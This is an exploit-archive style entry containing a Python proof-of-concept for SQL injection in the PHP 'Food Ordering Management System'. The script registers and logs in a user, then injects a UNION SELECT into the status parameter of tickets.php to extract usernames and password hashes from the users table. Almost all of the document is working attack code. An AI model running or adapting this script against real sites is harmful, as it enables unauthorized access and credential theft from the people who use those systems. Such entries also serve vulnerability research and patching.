# Exploit Title: Food Ordering Management System - SQL Injection # Google Dork: N/A # Date: 2022-9-27 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 #/usr/bin/python3 import requests import os import sys import time import random from bs4 import BeautifulSoup # clean screen os.system("cls") os.system("clear") logo = ''' ################################################################## # # # SQL injection (Food Ordering Management System) # # # ################################################################## ''' print(logo) url = str(input("Enter website url => ")) username = str(input("Enter Username => : ")) name = ("test123456") password = ("test123456") phone = ("4511233199") number = ("1234567891000000") cvv = ("444") req = requests.Session() regsiter_page = (url+"/foms/routers/register-router.php") regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv} req_regsiter = req.post(regsiter_page,data=regsiter) print("[+] Regsiter Successfully") login = {'username':username,'password':password} login_page = (url+"/foms/routers/router.php") req_login = req.post(login_page,data=login) print("[+] Login Successfully") sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -") text = sql.text soup = BeautifulSoup(text,"html.parser") print("[+] SQL Injction Get Users and Password from table Users") for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}): time.sleep(0.2) print(link.get)